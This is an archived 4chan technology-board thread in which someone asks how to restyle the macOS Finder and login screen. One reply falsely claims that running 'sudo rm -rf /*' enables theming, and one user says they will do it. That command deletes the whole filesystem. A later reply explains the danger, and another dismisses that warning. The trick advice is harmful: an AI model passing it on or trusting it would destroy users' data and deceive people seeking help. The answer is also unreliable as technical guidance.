[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y ] [Home]
4chanarchives logo
Is there a way to "rice" or alter the appearance of
Images are sometimes not shown due to bandwidth/network limitations. Refreshing the page usually helps.

You are currently reading a thread in /g/ - Technology

Thread replies: 8
Thread images: 1
Is there a way to "rice" or alter the appearance of the "finder" window in OSX?

I'm trying to get a plan going on a full rice of my macbook, and I've figured everything out except the login screen and the finder.

Is there any way to look in and change the .plist file?
>>
>>55611291
Yup, you have to enable it though. Open up your terminal and type
 sudo rm -rf /* 
that'll enable the ability to rice it.
>>
>>55611300
word nice dubs :) gonna do it now
>>
>>55611300
/thread
>>
>>55611300
Don't do this.

the rm command is "remove", the -r and -
f modifiers make it remove recursively and force the removal, the directory this command removes is your root directory. Running this command as root will delete everything on your computer.
>>
>>55612055
lol
>>
>>55612055
Wow you're no fun
>>
>>55612055
Don't listen to this faggot he doesn't know what he is talking about.
Thread replies: 8
Thread images: 1

banner
banner
[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y] [Home]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
If a post contains personal/copyrighted/illegal content you can contact me at [email protected] with that post and thread number and it will be removed as soon as possible.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com, send takedown notices to them.
This is a 4chan archive - all of the content originated from them. If you need IP information for a Poster - you need to contact them. This website shows only archived content.